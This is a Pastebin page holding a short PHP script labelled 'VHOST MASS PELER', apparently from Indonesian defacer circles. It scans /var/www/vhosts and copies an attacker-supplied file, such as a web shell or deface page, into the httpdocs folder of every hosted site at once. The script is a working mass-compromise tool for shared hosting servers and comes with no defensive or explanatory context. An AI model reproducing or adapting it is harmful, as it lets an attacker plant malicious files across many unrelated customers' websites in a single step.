Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*VHOST MASS PELER
- php file.php scriptnya scriptpepes
- */
- $tytyd = $argv[1];
- $henceut = $argv[2];
- $azx = scandir("/var/www/vhosts");
- foreach($azx as $ax) {
- copy($tytyd,"/var/www/vhosts/".$ax."/httpdocs/".$henceut);
- }
Add Comment
Please, Sign In to add comment